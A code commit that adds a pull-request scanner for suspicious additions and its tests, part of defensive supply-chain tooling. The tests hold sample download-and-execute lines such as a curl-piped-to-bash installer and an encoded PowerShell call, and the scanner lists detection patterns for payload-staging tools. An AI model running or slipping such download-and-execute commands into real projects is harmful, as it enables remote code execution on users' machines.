Feature/pr intent scan hardening (#375)
* security: harden suspicious PR intent scanner * security: reduce pr scanner false positives
This commit is contained in:
136
scripts/pr-intent-scan.test.ts
Normal file
136
scripts/pr-intent-scan.test.ts
Normal file
@@ -0,0 +1,136 @@
|
||||
import { describe, expect, test } from 'bun:test'
|
||||
|
||||
import { scanAddedLines, type DiffLine } from './pr-intent-scan.ts'
|
||||
|
||||
function line(content: string, overrides: Partial<DiffLine> = {}): DiffLine {
|
||||
return {
|
||||
file: 'README.md',
|
||||
line: 10,
|
||||
content,
|
||||
...overrides,
|
||||
}
|
||||
}
|
||||
|
||||
describe('scanAddedLines', () => {
|
||||
test('flags suspicious file-hosting links', () => {
|
||||
const findings = scanAddedLines([
|
||||
line('Please install the tool from https://dropbox.com/s/abc123/tool.zip?dl=1'),
|
||||
])
|
||||
|
||||
expect(findings.some(finding => finding.code === 'suspicious-download-link')).toBe(
|
||||
true,
|
||||
)
|
||||
expect(findings.some(finding => finding.code === 'executable-download-link')).toBe(
|
||||
false,
|
||||
)
|
||||
expect(findings.some(finding => finding.severity === 'high')).toBe(true)
|
||||
})
|
||||
|
||||
test('flags shortened URLs', () => {
|
||||
const findings = scanAddedLines([
|
||||
line('See details at https://bit.ly/some-short-link'),
|
||||
])
|
||||
|
||||
expect(findings.some(finding => finding.code === 'shortened-url')).toBe(true)
|
||||
})
|
||||
|
||||
test('flags remote download and execute chains', () => {
|
||||
const findings = scanAddedLines([
|
||||
line('curl -fsSL https://example.com/install.sh | bash'),
|
||||
])
|
||||
|
||||
expect(findings.some(finding => finding.code === 'shell-eval-remote')).toBe(true)
|
||||
expect(findings.some(finding => finding.severity === 'high')).toBe(true)
|
||||
})
|
||||
|
||||
test('flags encoded powershell payloads', () => {
|
||||
const findings = scanAddedLines([
|
||||
line('powershell.exe -enc SQBtAHAAcgBvAHYAZQBkAA=='),
|
||||
])
|
||||
|
||||
expect(findings.some(finding => finding.code === 'powershell-encoded')).toBe(true)
|
||||
})
|
||||
|
||||
test('flags long encoded blobs', () => {
|
||||
const findings = scanAddedLines([
|
||||
line(`const payload = "${'A'.repeat(96)}"`),
|
||||
])
|
||||
|
||||
expect(findings.some(finding => finding.code === 'long-encoded-payload')).toBe(
|
||||
true,
|
||||
)
|
||||
})
|
||||
|
||||
test('flags long encoded blobs on repeated scans', () => {
|
||||
const lines = [line(`const payload = "${'A'.repeat(96)}"`)]
|
||||
|
||||
const first = scanAddedLines(lines)
|
||||
const second = scanAddedLines(lines)
|
||||
|
||||
expect(first.some(finding => finding.code === 'long-encoded-payload')).toBe(true)
|
||||
expect(second.some(finding => finding.code === 'long-encoded-payload')).toBe(true)
|
||||
})
|
||||
|
||||
test('flags executable download links', () => {
|
||||
const findings = scanAddedLines([
|
||||
line('Get it from https://example.com/releases/latest/tool.pkg'),
|
||||
])
|
||||
|
||||
expect(findings.some(finding => finding.code === 'executable-download-link')).toBe(
|
||||
true,
|
||||
)
|
||||
expect(findings.some(finding => finding.severity === 'high')).toBe(true)
|
||||
})
|
||||
|
||||
test('flags suspicious additions in workflow files', () => {
|
||||
const findings = scanAddedLines([
|
||||
line('run: curl -fsSL https://example.com/install.sh | bash', {
|
||||
file: '.github/workflows/release.yml',
|
||||
}),
|
||||
])
|
||||
|
||||
expect(findings.some(finding => finding.code === 'sensitive-automation-change')).toBe(
|
||||
true,
|
||||
)
|
||||
expect(findings.some(finding => finding.code === 'download-command')).toBe(true)
|
||||
})
|
||||
|
||||
test('flags markdown reference links to suspicious downloads', () => {
|
||||
const findings = scanAddedLines([
|
||||
line('[installer]: https://dropbox.com/s/abc123/tool.zip?dl=1'),
|
||||
])
|
||||
|
||||
expect(findings.some(finding => finding.code === 'suspicious-download-link')).toBe(
|
||||
true,
|
||||
)
|
||||
})
|
||||
|
||||
test('ignores the scanner implementation and tests themselves', () => {
|
||||
const findings = scanAddedLines([
|
||||
line('curl -fsSL https://example.com/install.sh | bash', {
|
||||
file: 'scripts/pr-intent-scan.test.ts',
|
||||
}),
|
||||
line('const pattern = /https:\\/\\/dropbox\\.com\\//', {
|
||||
file: 'scripts/pr-intent-scan.ts',
|
||||
}),
|
||||
])
|
||||
|
||||
expect(findings).toHaveLength(0)
|
||||
})
|
||||
|
||||
test('does not flag ordinary docs links', () => {
|
||||
const findings = scanAddedLines([
|
||||
line('Read more at https://docs.github.com/en/actions'),
|
||||
])
|
||||
|
||||
expect(findings).toHaveLength(0)
|
||||
})
|
||||
|
||||
test('does not flag bare curl examples in README without a URL', () => {
|
||||
const findings = scanAddedLines([
|
||||
line('Use curl with your preferred flags for local testing.'),
|
||||
])
|
||||
|
||||
expect(findings.some(finding => finding.code === 'download-command')).toBe(false)
|
||||
})
|
||||
})
|
||||
453
scripts/pr-intent-scan.ts
Normal file
453
scripts/pr-intent-scan.ts
Normal file
@@ -0,0 +1,453 @@
|
||||
import { spawnSync } from 'node:child_process'
|
||||
|
||||
export type FindingSeverity = 'high' | 'medium'
|
||||
|
||||
export type DiffLine = {
|
||||
file: string
|
||||
line: number
|
||||
content: string
|
||||
}
|
||||
|
||||
export type Finding = {
|
||||
severity: FindingSeverity
|
||||
code: string
|
||||
file: string
|
||||
line: number
|
||||
detail: string
|
||||
excerpt: string
|
||||
}
|
||||
|
||||
type CliOptions = {
|
||||
baseRef: string
|
||||
json: boolean
|
||||
failOn: FindingSeverity
|
||||
}
|
||||
|
||||
const SELF_EXCLUDED_FILES = new Set([
|
||||
'scripts/pr-intent-scan.ts',
|
||||
'scripts/pr-intent-scan.test.ts',
|
||||
])
|
||||
|
||||
const SHORTENER_DOMAINS = [
|
||||
'bit.ly',
|
||||
'tinyurl.com',
|
||||
'goo.gl',
|
||||
't.co',
|
||||
'is.gd',
|
||||
'rb.gy',
|
||||
'cutt.ly',
|
||||
]
|
||||
|
||||
const SUSPICIOUS_DOWNLOAD_DOMAINS = [
|
||||
'dropbox.com',
|
||||
'dl.dropboxusercontent.com',
|
||||
'drive.google.com',
|
||||
'docs.google.com',
|
||||
'mega.nz',
|
||||
'mediafire.com',
|
||||
'transfer.sh',
|
||||
'anonfiles.com',
|
||||
'catbox.moe',
|
||||
]
|
||||
|
||||
const URL_REGEX = /\bhttps?:\/\/[^\s)>"']+/gi
|
||||
const LONG_BASE64_REGEX = /\b(?:[A-Za-z0-9+/]{80,}={0,2}|[A-Za-z0-9_-]{80,})\b/
|
||||
const EXECUTABLE_PATH_REGEX =
|
||||
/\.(?:sh|bash|zsh|ps1|exe|msi|pkg|deb|rpm|zip|tar|tgz|gz|xz|dmg|appimage)(?:$|[?#])/i
|
||||
const SENSITIVE_PATH_REGEX =
|
||||
/^(?:\.github\/workflows\/|scripts\/|bin\/|install(?:\/|\.|$)|.*(?:Dockerfile|docker-compose|compose\.ya?ml)$)/i
|
||||
|
||||
function parseOptions(argv: string[]): CliOptions {
|
||||
const options: CliOptions = {
|
||||
baseRef: 'origin/main',
|
||||
json: false,
|
||||
failOn: 'high',
|
||||
}
|
||||
|
||||
for (let index = 0; index < argv.length; index++) {
|
||||
const arg = argv[index]
|
||||
if (arg === '--json') {
|
||||
options.json = true
|
||||
continue
|
||||
}
|
||||
if (arg === '--base') {
|
||||
const next = argv[index + 1]
|
||||
if (next && !next.startsWith('--')) {
|
||||
options.baseRef = next
|
||||
index++
|
||||
}
|
||||
continue
|
||||
}
|
||||
if (arg === '--fail-on') {
|
||||
const next = argv[index + 1]
|
||||
if (next === 'high' || next === 'medium') {
|
||||
options.failOn = next
|
||||
index++
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return options
|
||||
}
|
||||
|
||||
function trimExcerpt(content: string): string {
|
||||
const compact = content.trim().replace(/\s+/g, ' ')
|
||||
return compact.length > 140 ? `${compact.slice(0, 137)}...` : compact
|
||||
}
|
||||
|
||||
function uniqueFindings(findings: Finding[]): Finding[] {
|
||||
const seen = new Set<string>()
|
||||
return findings.filter(finding => {
|
||||
const key = `${finding.code}:${finding.file}:${finding.line}:${finding.detail}`
|
||||
if (seen.has(key)) {
|
||||
return false
|
||||
}
|
||||
seen.add(key)
|
||||
return true
|
||||
})
|
||||
}
|
||||
|
||||
function parseAddedLines(diffText: string): DiffLine[] {
|
||||
const lines = diffText.split('\n')
|
||||
const added: DiffLine[] = []
|
||||
let currentFile: string | null = null
|
||||
let currentLine = 0
|
||||
|
||||
for (const rawLine of lines) {
|
||||
if (rawLine.startsWith('+++ b/')) {
|
||||
currentFile = rawLine.slice('+++ b/'.length)
|
||||
continue
|
||||
}
|
||||
|
||||
if (rawLine.startsWith('@@')) {
|
||||
const match = /\+(\d+)(?:,(\d+))?/.exec(rawLine)
|
||||
if (match) {
|
||||
currentLine = Number(match[1])
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
if (!currentFile) {
|
||||
continue
|
||||
}
|
||||
|
||||
if (rawLine.startsWith('+') && !rawLine.startsWith('+++')) {
|
||||
added.push({
|
||||
file: currentFile,
|
||||
line: currentLine,
|
||||
content: rawLine.slice(1),
|
||||
})
|
||||
currentLine += 1
|
||||
continue
|
||||
}
|
||||
|
||||
if (rawLine.startsWith('-') && !rawLine.startsWith('---')) {
|
||||
continue
|
||||
}
|
||||
|
||||
if (!rawLine.startsWith('\\')) {
|
||||
currentLine += 1
|
||||
}
|
||||
}
|
||||
|
||||
return added
|
||||
}
|
||||
|
||||
function tryParseUrl(value: string): URL | null {
|
||||
try {
|
||||
return new URL(value)
|
||||
} catch {
|
||||
return null
|
||||
}
|
||||
}
|
||||
|
||||
function hostMatches(hostname: string, domain: string): boolean {
|
||||
return hostname === domain || hostname.endsWith(`.${domain}`)
|
||||
}
|
||||
|
||||
function hasSuspiciousDownloadIndicators(url: URL): boolean {
|
||||
const combined = `${url.pathname}${url.search}`.toLowerCase()
|
||||
return (
|
||||
combined.includes('dl=1') ||
|
||||
combined.includes('raw=1') ||
|
||||
combined.includes('export=download') ||
|
||||
combined.includes('/download') ||
|
||||
combined.includes('/uc?export=download')
|
||||
)
|
||||
}
|
||||
|
||||
function findUrlFindings(line: DiffLine): Finding[] {
|
||||
const findings: Finding[] = []
|
||||
const matches = line.content.match(URL_REGEX) ?? []
|
||||
|
||||
for (const match of matches) {
|
||||
const parsed = tryParseUrl(match)
|
||||
if (!parsed) continue
|
||||
|
||||
const hostname = parsed.hostname.toLowerCase()
|
||||
|
||||
for (const domain of SHORTENER_DOMAINS) {
|
||||
if (hostMatches(hostname, domain)) {
|
||||
findings.push({
|
||||
severity: 'medium',
|
||||
code: 'shortened-url',
|
||||
file: line.file,
|
||||
line: line.line,
|
||||
detail: `Added shortened URL: ${hostname}`,
|
||||
excerpt: trimExcerpt(line.content),
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
const isSuspiciousHost = SUSPICIOUS_DOWNLOAD_DOMAINS.some(domain =>
|
||||
hostMatches(hostname, domain),
|
||||
)
|
||||
const isExecutableDownload = EXECUTABLE_PATH_REGEX.test(
|
||||
`${parsed.pathname}${parsed.search}`,
|
||||
)
|
||||
|
||||
if (isSuspiciousHost) {
|
||||
findings.push({
|
||||
severity:
|
||||
hasSuspiciousDownloadIndicators(parsed) || isExecutableDownload
|
||||
? 'high'
|
||||
: 'medium',
|
||||
code: 'suspicious-download-link',
|
||||
file: line.file,
|
||||
line: line.line,
|
||||
detail: `Added external file-hosting link: ${hostname}`,
|
||||
excerpt: trimExcerpt(line.content),
|
||||
})
|
||||
} else if (isExecutableDownload) {
|
||||
findings.push({
|
||||
severity: 'high',
|
||||
code: 'executable-download-link',
|
||||
file: line.file,
|
||||
line: line.line,
|
||||
detail: `Added direct link to executable or archive payload: ${hostname}`,
|
||||
excerpt: trimExcerpt(line.content),
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
return findings
|
||||
}
|
||||
|
||||
function findSensitivePathFindings(line: DiffLine): Finding[] {
|
||||
if (!SENSITIVE_PATH_REGEX.test(line.file)) {
|
||||
return []
|
||||
}
|
||||
|
||||
const lower = line.content.toLowerCase()
|
||||
|
||||
if (
|
||||
/\b(curl|wget|invoke-webrequest|iwr|powershell|bash|sh|chmod\s+\+x)\b/i.test(
|
||||
line.content,
|
||||
) ||
|
||||
URL_REGEX.test(line.content) ||
|
||||
lower.includes('download')
|
||||
) {
|
||||
return [
|
||||
{
|
||||
severity: 'medium',
|
||||
code: 'sensitive-automation-change',
|
||||
file: line.file,
|
||||
line: line.line,
|
||||
detail:
|
||||
'Added network, execution, or download-related content in a sensitive automation file',
|
||||
excerpt: trimExcerpt(line.content),
|
||||
},
|
||||
]
|
||||
}
|
||||
|
||||
return []
|
||||
}
|
||||
|
||||
function findCommandFindings(line: DiffLine): Finding[] {
|
||||
const findings: Finding[] = []
|
||||
const lower = line.content.toLowerCase()
|
||||
|
||||
const highPatterns: Array<[string, RegExp, string]> = [
|
||||
[
|
||||
'download-exec-chain',
|
||||
/\b(curl|wget|invoke-webrequest|iwr)\b.*(\|\s*(sh|bash|zsh)|;\s*chmod\s+\+x|&&\s*\.\.?\/|>\s*\/tmp\/)/i,
|
||||
'Added remote download followed by execution or staging',
|
||||
],
|
||||
[
|
||||
'powershell-encoded',
|
||||
/\bpowershell(?:\.exe)?\b.*(?:-enc|-encodedcommand)\b/i,
|
||||
'Added encoded PowerShell invocation',
|
||||
],
|
||||
[
|
||||
'shell-eval-remote',
|
||||
/\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b/i,
|
||||
'Added shell pipe from remote content into interpreter',
|
||||
],
|
||||
[
|
||||
'binary-lolbin',
|
||||
/\b(mshta|rundll32|regsvr32|certutil)\b/i,
|
||||
'Added living-off-the-land binary often used for payload staging',
|
||||
],
|
||||
[
|
||||
'invoke-expression',
|
||||
/\b(iex|invoke-expression)\b/i,
|
||||
'Added PowerShell expression execution',
|
||||
],
|
||||
]
|
||||
|
||||
const mediumPatterns: Array<[string, RegExp, string]> = [
|
||||
[
|
||||
'download-command',
|
||||
/\b(curl|wget|invoke-webrequest|iwr)\b.*https?:\/\//i,
|
||||
'Added command that downloads remote content',
|
||||
],
|
||||
[
|
||||
'archive-extract-exec',
|
||||
/\b(unzip|tar|7z)\b.*(&&|;).*\b(chmod|node|python|bash|sh)\b/i,
|
||||
'Added archive extraction followed by execution',
|
||||
],
|
||||
[
|
||||
'base64-decode',
|
||||
/\b(base64\s+-d|openssl\s+base64\s+-d|python .*b64decode)\b/i,
|
||||
'Added explicit payload decode step',
|
||||
],
|
||||
]
|
||||
|
||||
for (const [code, pattern, detail] of highPatterns) {
|
||||
if (pattern.test(line.content)) {
|
||||
findings.push({
|
||||
severity: 'high',
|
||||
code,
|
||||
file: line.file,
|
||||
line: line.line,
|
||||
detail,
|
||||
excerpt: trimExcerpt(line.content),
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
for (const [code, pattern, detail] of mediumPatterns) {
|
||||
if (code === 'download-command' && !SENSITIVE_PATH_REGEX.test(line.file)) {
|
||||
continue
|
||||
}
|
||||
if (pattern.test(line.content)) {
|
||||
findings.push({
|
||||
severity: 'medium',
|
||||
code,
|
||||
file: line.file,
|
||||
line: line.line,
|
||||
detail,
|
||||
excerpt: trimExcerpt(line.content),
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
if (LONG_BASE64_REGEX.test(line.content) && !lower.includes('sha256') && !lower.includes('sha512')) {
|
||||
findings.push({
|
||||
severity: 'medium',
|
||||
code: 'long-encoded-payload',
|
||||
file: line.file,
|
||||
line: line.line,
|
||||
detail: 'Added long encoded blob or token-like payload',
|
||||
excerpt: trimExcerpt(line.content),
|
||||
})
|
||||
}
|
||||
|
||||
return findings
|
||||
}
|
||||
|
||||
export function scanAddedLines(lines: DiffLine[]): Finding[] {
|
||||
const findings = lines
|
||||
.filter(line => !SELF_EXCLUDED_FILES.has(line.file))
|
||||
.flatMap(line => [
|
||||
...findUrlFindings(line),
|
||||
...findCommandFindings(line),
|
||||
...findSensitivePathFindings(line),
|
||||
])
|
||||
return uniqueFindings(findings)
|
||||
}
|
||||
|
||||
export function getGitDiff(baseRef: string): string {
|
||||
const mergeBase = spawnSync('git', ['merge-base', baseRef, 'HEAD'], {
|
||||
encoding: 'utf8',
|
||||
})
|
||||
|
||||
if (mergeBase.status !== 0) {
|
||||
throw new Error(
|
||||
`Could not determine merge-base with ${baseRef}: ${mergeBase.stderr.trim() || mergeBase.stdout.trim()}`,
|
||||
)
|
||||
}
|
||||
|
||||
const base = mergeBase.stdout.trim()
|
||||
const diff = spawnSync(
|
||||
'git',
|
||||
['diff', '--unified=0', '--no-ext-diff', `${base}...HEAD`],
|
||||
{ encoding: 'utf8' },
|
||||
)
|
||||
|
||||
if (diff.status !== 0) {
|
||||
throw new Error(`git diff failed: ${diff.stderr.trim() || diff.stdout.trim()}`)
|
||||
}
|
||||
|
||||
return diff.stdout
|
||||
}
|
||||
|
||||
function shouldFail(findings: Finding[], failOn: FindingSeverity): boolean {
|
||||
if (failOn === 'medium') {
|
||||
return findings.length > 0
|
||||
}
|
||||
return findings.some(finding => finding.severity === 'high')
|
||||
}
|
||||
|
||||
function renderText(findings: Finding[]): string {
|
||||
if (findings.length === 0) {
|
||||
return 'PR intent scan: no suspicious additions found.'
|
||||
}
|
||||
|
||||
const high = findings.filter(f => f.severity === 'high')
|
||||
const medium = findings.filter(f => f.severity === 'medium')
|
||||
const lines = [
|
||||
`PR intent scan: ${findings.length} finding(s)`,
|
||||
`- high: ${high.length}`,
|
||||
`- medium: ${medium.length}`,
|
||||
'',
|
||||
]
|
||||
|
||||
for (const finding of findings) {
|
||||
lines.push(
|
||||
`[${finding.severity.toUpperCase()}] ${finding.file}:${finding.line} ${finding.detail}`,
|
||||
)
|
||||
lines.push(` ${finding.excerpt}`)
|
||||
}
|
||||
|
||||
return lines.join('\n')
|
||||
}
|
||||
|
||||
export function run(options: CliOptions): number {
|
||||
const diff = getGitDiff(options.baseRef)
|
||||
const addedLines = parseAddedLines(diff)
|
||||
const findings = scanAddedLines(addedLines)
|
||||
|
||||
if (options.json) {
|
||||
process.stdout.write(
|
||||
`${JSON.stringify(
|
||||
{
|
||||
baseRef: options.baseRef,
|
||||
addedLines: addedLines.length,
|
||||
findings,
|
||||
},
|
||||
null,
|
||||
2,
|
||||
)}\n`,
|
||||
)
|
||||
} else {
|
||||
process.stdout.write(`${renderText(findings)}\n`)
|
||||
}
|
||||
|
||||
return shouldFail(findings, options.failOn) ? 1 : 0
|
||||
}
|
||||
|
||||
if (import.meta.main) {
|
||||
const options = parseOptions(process.argv.slice(2))
|
||||
process.exitCode = run(options)
|
||||
}
|
||||
Reference in New Issue
Block a user